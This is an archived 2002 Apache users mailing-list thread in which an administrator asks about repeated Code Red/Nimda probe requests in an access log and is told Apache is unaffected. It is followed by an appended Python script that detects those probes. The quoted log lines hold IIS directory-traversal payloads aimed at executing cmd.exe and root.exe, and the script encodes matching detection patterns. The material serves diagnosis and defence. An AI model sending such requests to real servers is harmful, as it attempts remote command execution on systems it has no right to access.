httpd-users mailing list archives

From "Andrew Kenna" <andr...@stamina.com.au>
Subject RE: [users@httpd] httpd-access.log query
Date Fri, 13 Sep 2002 00:34:29 GMT
They are Microsoft security holes, such as Code Red, Nimda, etc.

Your Apache server is not vulnerable. For more information, check out the
Apache FAQ on httpd.apache.org.

Andrew


-----Original Message-----
From: Doug Young [mailto:dougy@brizzie.org] 
Sent: Friday, 13 September 2002 10:21 AM
To: users@httpd.apache.org
Subject: [users@httpd] httpd-access.log query


Been getting HEAPS of messages like these in httpd-access.log lately
.... assume the script kiddies at play again ... not that those commands
won't help them much on a Unix system. I've been firewalling the offending
IPs but wonder if there is a better remedy.

Any suggestions / comments ??


203.51.185.233 - - [13/Sep/2002:04:02:05 +1000] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 278 "-" "-"
203.51.185.233 - - [13/Sep/2002:04:02:06 +1000] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 276 "-" "-"
203.51.185.233 - - [13/Sep/2002:04:02:07 +1000] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 286 "
203.51.185.233 - - [13/Sep/2002:04:02:07 +1000] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 286 "
203.51.185.233 - - [13/Sep/2002:04:02:08 +1000] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTT
203.51.185.233 - - [13/Sep/2002:04:02:09 +1000] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system
203.51.185.233 - - [13/Sep/2002:04:02:09 +1000] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system
203.51.185.233 - - [13/Sep/2002:04:02:10 +1000] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%
203.51.185.233 - - [13/Sep/2002:04:02:11 +1000] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HT
203.51.185.233 - - [13/Sep/2002:04:02:11 +1000] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HT
203.51.185.233 - - [13/Sep/2002:04:02:11 +1000] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HT
203.51.185.233 - - [13/Sep/2002:04:02:12 +1000] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HT
203.51.185.233 - - [13/Sep/2002:04:02:12 +1000] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir H
203.51.185.233 - - [13/Sep/2002:04:02:13 +1000] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTT
203.51.185.233 - - [13/Sep/2002:04:02:13 +1000] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir
203.51.185.233 - - [13/Sep/2002:04:02:13 +1000] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTT
203.69.217.130 - - [13/Sep/2002:06:46:35 +1000] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 278 "-" "-"
203.69.217.130 - - [13/Sep/2002:06:46:36 +1000] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 276 "-" "-"
203.69.217.130 - - [13/Sep/2002:06:46:37 +1000] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 286 "
203.69.217.130 - - [13/Sep/2002:06:46:38 +1000] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 286 "
203.69.217.130 - - [13/Sep/2002:06:46:39 +1000] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTT
203.69.217.130 - - [13/Sep/2002:06:46:39 +1000] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system
203.69.217.130 - - [13/Sep/2002:06:46:40 +1000] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system
203.69.217.130 - - [13/Sep/2002:06:46:41 +1000] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%
203.69.217.130 - - [13/Sep/2002:06:46:42 +1000] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HT
203.69.217.130 - - [13/Sep/2002:06:46:42 +1000] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HT
203.69.217.130 - - [13/Sep/2002:06:46:43 +1000] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HT
203.69.217.130 - - [13/Sep/2002:06:46:44 +1000] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HT
203.69.217.130 - - [13/Sep/2002:06:46:44 +1000] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir H
203.69.217.130 - - [13/Sep/2002:06:46:45 +1000] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTT
203.69.217.130 - - [13/Sep/2002:06:46:46 +1000] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir
203.69.217.130 - - [13/Sep/2002:06:46:46 +1000] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTT

210.8.46.149 - - [13/Sep/2002:07:22:53 +1000] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
203.247.201.233 - - [13/Sep/2002:09:58:44 +1000] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 278 "-" "-"



---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server
Project. See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
   "   from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org
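
A triage sketch for the kind of access-log noise quoted in this thread, added here as an example (not code from the thread or from the Apache project): it percent-decodes each request target until stable, tags double-encoded and overlong-UTF-8 traversal attempts, root.exe/cmd.exe probes and the default.ida request, and groups the flagged requests by client. The sample lines, tag names and function names are constructed for illustration; the addresses come from the documentation ranges.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_to_bytes

# Constructed sample in the shape of the quoted log (documentation addresses).
SAMPLE_LOG = """\
192.0.2.10 - - [13/Sep/2002:04:02:05 +1000] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 278 "-" "-"
192.0.2.10 - - [13/Sep/2002:04:02:08 +1000] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300 "-" "-"
192.0.2.10 - - [13/Sep/2002:04:02:11 +1000] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300 "-" "-"
198.51.100.7 - - [13/Sep/2002:07:22:53 +1000] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNN HTTP/1.0" 404 270 "-" "-"
203.0.113.5 - - [13/Sep/2002:08:00:00 +1000] "GET /index.html HTTP/1.0" 200 1024 "-" "-"
"""

# Only the client address and the request target are required, so truncated lines still parse.
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+)')
OVERLONG_RE = re.compile(rb"[\xc0\xc1].")  # 0xC0/0xC1 lead bytes are never valid UTF-8

def decode_fully(target, max_rounds=5):
    """Percent-decode until stable; return (bytes, number of decoding rounds)."""
    data, rounds = target.encode(), 0
    while rounds < max_rounds and (nxt := unquote_to_bytes(data)) != data:
        data, rounds = nxt, rounds + 1
    return data, rounds

def classify(target):
    """Return the set of probe tags that apply to one request target."""
    raw, rounds = decode_fully(target)
    path = raw.split(b"?", 1)[0].lower().replace(b"\\", b"/")
    checks = {
        "double-encoding": rounds > 1,
        "overlong-utf8": bool(OVERLONG_RE.search(raw)),
        "traversal": b"../" in path,
        "windows-shell-probe": path.endswith((b"/cmd.exe", b"/root.exe")),
        "ida-overflow-probe": path.endswith(b"/default.ida") and b"?" + b"N" * 20 in raw,
    }
    return {tag for tag, hit in checks.items() if hit}

def summarize(log_text):
    """Return {client: (flagged request count, sorted tags)} for flagged clients."""
    hits = defaultdict(lambda: [0, set()])
    for m in filter(None, map(LINE_RE.match, log_text.splitlines())):
        tags = classify(m.group(2))
        if tags:
            hits[m.group(1)][0] += 1
            hits[m.group(1)][1] |= tags
    return {ip: (n, sorted(tags)) for ip, (n, tags) in hits.items()}

if __name__ == "__main__":
    print(summarize(SAMPLE_LOG))
```
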